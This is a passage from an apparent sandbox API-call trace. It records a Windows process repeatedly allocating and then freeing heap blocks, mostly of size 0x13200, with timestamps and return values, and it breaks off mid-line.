[0117.968] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x489b30 | out: hHeap=0x470000) returned 1 [0117.968] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x501320 [0117.969] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x30) returned 0x47e0c0 [0117.969] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x47af50 | out: hHeap=0x470000) returned 1 [0117.969] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x514530 [0117.969] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x527740 [0117.970] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x48) returned 0x481350 [0117.970] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x47e0c0 | out: hHeap=0x470000) returned 1 [0117.970] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x53a950 [0117.971] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x54db60 [0117.971] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x1f40080 [0117.972] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x68) returned 0x47b640 [0117.972] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x481350 | out: hHeap=0x470000) returned 1 [0117.972] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x1f53290 [0117.973] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x1f664a0 [0117.974] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x1f796b0 [0117.975] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x1f8c8c0 [0118.186] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x98) returned 0x4788a0 [0118.186] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x47b640 | out: hHeap=0x470000) returned 1 [0118.186] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x1f9fad0 [0118.187] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x1fb2ce0 [0118.187] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x1fc5ef0 [0118.188] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x1fd9100 [0118.188] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x1fec310 [0118.189] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x1fff520 [0118.189] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xe0) returned 0x474c50 [0118.189] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4788a0 | out: hHeap=0x470000) returned 1 [0118.189] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2012730 [0118.190] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2040080 [0118.191] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2053290 [0118.192] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x20664a0 [0118.192] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x20796b0 [0118.192] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x208c8c0 [0118.193] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x209fad0 [0118.193] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x20b2ce0 [0118.194] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x20c5ef0 [0118.194] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x150) returned 0x47ac50 [0118.195] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x474c50 | out: hHeap=0x470000) returned 1 [0118.195] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x20d9100 [0118.195] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x20ec310 [0118.195] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x20ff520 [0118.196] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2112730 [0118.196] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2125940 [0118.197] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2138b50 [0118.197] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x214bd60 [0118.198] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x215ef70 [0118.198] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2172180 [0118.199] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2185390 [0118.199] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x21985a0 [0118.199] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x21ab7b0 [0118.200] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x21be9c0 [0118.200] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x21d1bd0 [0118.200] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1f8) returned 0x47c460 [0118.200] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x47ac50 | out: hHeap=0x470000) returned 1 [0118.200] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x21e4de0 [0118.200] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x21f7ff0 [0118.201] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x220b200 [0118.202] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x221e410 [0118.202] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2240080 [0118.203] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2253290 [0118.203] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x22664a0 [0118.204] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x22796b0 [0118.204] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x228c8c0 [0118.205] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x229fad0 [0118.205] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x22b2ce0 [0118.205] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x22c5ef0 [0118.206] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x22d9100 [0118.206] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x22ec310 [0118.207] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x22ff520 [0118.207] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2312730 [0118.208] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2325940 [0118.208] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2338b50 [0118.209] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x234bd60 [0118.209] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x235ef70 [0118.209] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2372180 [0118.210] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x2f0) returned 0x47a840 [0118.210] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x47c460 | out: hHeap=0x470000) returned 1 [0118.210] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2385390 [0118.211] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x23985a0 [0118.211] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x23ab7b0 [0118.212] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x23be9c0 [0118.212] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x23d1bd0 [0118.212] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x23e4de0 [0118.212] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x23f7ff0 [0118.213] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x240b200 [0118.213] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x241e410 [0118.214] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2431620 [0118.214] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2444830 [0118.214] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2457a40 [0118.215] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x246ac50 [0118.215] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x247de60 [0118.215] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2491070 [0118.216] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x24a4280 [0118.216] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x24b7490 [0118.217] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x24ca6a0 [0118.217] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x24dd8b0 [0118.217] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x24f0ac0 [0118.218] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2503cd0 [0118.218] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2516ee0 [0118.219] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x252a0f0 [0118.219] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x253d300 [0118.220] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2550510 [0118.220] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2563720 [0118.221] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2576930 [0118.419] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2589b40 [0118.419] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x259cd50 [0118.419] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x25aff60 [0118.420] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x25c3170 [0118.420] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x468) returned 0x488b70 [0118.420] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x47a840 | out: hHeap=0x470000) returned 1 [0118.420] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x25d6380 [0118.420] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x25e9590 [0118.421] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x25fc7a0 [0118.421] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x260f9b0 [0118.422] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2622bc0 [0118.422] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2640080 [0118.424] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2653290 [0118.424] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x26664a0 [0118.425] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x26796b0 [0118.426] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x268c8c0 [0118.426] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x269fad0 [0118.427] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x26b2ce0 [0118.427] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x26c5ef0 [0118.427] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x26d9100 [0118.428] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x26ec310 [0118.428] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x26ff520 [0118.429] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2712730 [0118.429] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2725940 [0118.429] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2738b50 [0118.430] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x274bd60 [0118.430] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x275ef70 [0118.431] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2772180 [0118.431] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2785390 [0118.431] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x27985a0 [0118.432] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x27ab7b0 [0118.433] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x27be9c0 [0118.433] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x27d1bd0 [0118.433] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x27e4de0 [0118.434] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x27f7ff0 [0118.434] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x280b200 [0118.436] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x281e410 [0118.436] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2831620 [0118.437] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2844830 [0118.437] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2857a40 [0118.438] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x286ac50 [0118.438] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x287de60 [0118.439] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2891070 [0118.439] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x28a4280 [0118.440] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x28b7490 [0118.440] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x28ca6a0 [0118.441] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x28dd8b0 [0118.442] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x28f0ac0 [0118.442] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2903cd0 [0118.442] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2916ee0 [0118.443] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x292a0f0 [0118.443] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x293d300 [0118.443] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2950510 [0118.444] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x698) returned 0x488fe0 [0118.444] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488b70 | out: hHeap=0x470000) returned 1 [0118.444] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2963720 [0118.444] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2976930 [0118.445] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2989b40 [0118.445] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x299cd50 [0118.445] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x29aff60 [0118.446] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x29c3170 [0118.446] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x29d6380 [0118.446] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x29e9590 [0118.447] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x29fc7a0 [0118.447] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2a0f9b0 [0118.448] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2a22bc0 [0118.448] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2a35dd0 [0118.449] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2a48fe0 [0118.449] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2a5c1f0 [0118.449] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2a6f400 [0118.450] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2a82610 [0118.450] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2a95820 [0118.451] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2aa8a30 [0118.451] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2abbc40 [0118.451] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2acee50 [0118.452] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2ae2060 [0118.452] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2af5270 [0118.452] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2b08480 [0118.453] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2b1b690 [0118.453] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2b2e8a0 [0118.453] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2b41ab0 [0118.453] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2b54cc0 [0118.454] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2b67ed0 [0118.454] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2b7b0e0 [0118.643] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2b8e2f0 [0118.644] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2ba1500 [0118.644] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2bb4710 [0118.645] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2bc7920 [0118.645] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2bdab30 [0118.646] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2bedd40 [0118.647] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2c00f50 [0118.647] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2c14160 [0118.647] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2c27370 [0118.648] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2c3a580 [0118.649] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2c4d790 [0118.649] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2c609a0 [0118.650] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2c73bb0 [0118.650] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2c86dc0 [0118.651] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2c99fd0 [0118.651] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2cad1e0 [0118.651] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2cc03f0 [0118.652] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2cd3600 [0118.652] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2ce6810 [0118.653] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2cf9a20 [0118.653] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2d0cc30 [0118.653] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2d1fe40 [0118.654] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2d33050 [0118.654] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2d46260 [0118.655] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2d59470 [0118.655] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2d6c680 [0118.655] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2d7f890 [0118.656] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2d92aa0 [0118.656] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2da5cb0 [0118.656] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2db8ec0 [0118.657] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2dcc0d0 [0118.657] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2ddf2e0 [0118.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2df24f0 [0118.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2e05700 [0118.659] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2e18910 [0118.659] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2e40080 [0118.661] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2e53290 [0118.662] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2e664a0 [0118.663] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2e796b0 [0118.663] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2e8c8c0 [0118.664] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2e9fad0 [0118.665] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x9e0) returned 0x49d060 [0118.665] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488fe0 | out: hHeap=0x470000) returned 1 [0118.665] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2eb2ce0 [0118.666] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2ec5ef0 [0118.666] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2ed9100 [0118.667] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2eec310 [0118.667] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2eff520 [0118.668] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2f12730 [0118.669] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2f25940 [0118.669] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2f38b50 [0118.670] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2f4bd60 [0118.671] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2f5ef70 [0118.671] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2f72180 [0118.672] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2f85390 [0118.672] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2f985a0 [0118.673] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2fab7b0 [0118.673] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2fbe9c0 [0119.021] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x49d060 | out: hHeap=0x470000) returned 1 [0130.114] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4a7ef0 | out: hHeap=0x470000) returned 1 [0130.349] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4c7cf0 | out: hHeap=0x470000) returned 1 [0130.349] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4daf00 | out: hHeap=0x470000) returned 1 [0130.349] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ee110 | out: hHeap=0x470000) returned 1 [0130.349] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x501320 | out: hHeap=0x470000) returned 1 [0130.349] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x514530 | out: hHeap=0x470000) returned 1 [0130.349] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x527740 | out: hHeap=0x470000) returned 1 [0130.350] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x53a950 | out: hHeap=0x470000) returned 1 [0130.350] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54db60 | out: hHeap=0x470000) returned 1 [0130.350] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x1f40080 | out: hHeap=0x470000) returned 1 [0130.350] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x1f53290 | out: hHeap=0x470000) returned 1 [0130.350] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x1f664a0 | out: hHeap=0x470000) returned 1 [0130.350] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x1f796b0 | out: hHeap=0x470000) returned 1 [0130.350] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x1f8c8c0 | out: hHeap=0x470000) returned 1 [0130.350] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x1f9fad0 | out: hHeap=0x470000) returned 1 [0130.350] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x1fb2ce0 | out: hHeap=0x470000) returned 1 [0130.350] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x1fc5ef0 | out: hHeap=0x470000) returned 1 [0130.350] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x1fd9100 | out: hHeap=0x470000) returned 1 [0130.350] HeapFree (in: hHeap=0x470000, 